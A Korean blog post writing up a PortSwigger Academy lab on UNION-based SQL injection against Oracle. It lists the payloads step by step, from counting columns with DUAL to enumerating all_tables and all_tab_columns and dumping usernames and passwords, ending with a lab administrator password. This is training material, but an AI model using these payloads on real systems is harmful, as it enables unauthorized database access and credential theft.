일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
Tags
- 제넥신
- 불가피
- 픽크루
- 금리인하
- 스페인 코로나
- 고민정
- 유튜버 김재석
- 학교 개학 연기 4월
- 김영권 아내
- 임영규
- 스콜피온킹
- 홍혜걸
- 리리남매
- 최강욱
- 김재석
- 뭉쳐야 찬다
- 이상형 만들기
- 김영권
- 이지혜
- 미국 금리인하
- 은혜의 강 교회
- 조희연
- 성남은혜의강교회
- libtins
- 성남 코로나 확진자
- 킹덤 고근희
- 이태원 클라쓰 15회 예고
- 양적완화
- 해킹
- 폰폰테스트
Archives
- Today
- Total
Dork's port
SQL-injection - SQL injection attack, listing the database contents on Oracle 본문
portswigger-academy
SQL-injection - SQL injection attack, listing the database contents on Oracle
Dork94 2020. 7. 14. 16:21' UNION SELECT NULL,NULL FROM DUAL--
을 통해 2개의 필드인 것을 확인' UNION SELECT table_name,NULL FROM all_tables--
을 통해 table name을 확인 할 수 있다(ref https://docs.oracle.com/cd/B28359_01/server.111/b28320/statviews_2091.htm).' UNION SELECT table_name,column_name FROM all_tab_columns--
를 통해 이전 문제와 동일하게 테이블 이름과 column name을 얻을 수 있는데.. 결과가 너무 많다. 간단하게 얻을 수 있는 방법이 없을까..- 그냥 password로 검색해서(이전 문제에 password_XXX형식으로 바꿔져있는 것을 고려해서) 그럴듯 해보이는 것으로 찾았따. 쿼리 는
' UNION SELECT USERNAME_SOWLCR,PASSWORD_UDIJXQ FROM USERS_OVVUCI--
임 - 그랬더니 admin 아이디가 나옴.
administrator, fzvxgyre328ymsg1s3rp
이다. 기본테이블을 where문 등으로 제거하려 했으나 너무 길어질 것 같고, 그래서 다른 방법이 있나 solution을 보니 그닥없다.. 그냥 감으로 풀어야할듯
'portswigger-academy' 카테고리의 다른 글
Comments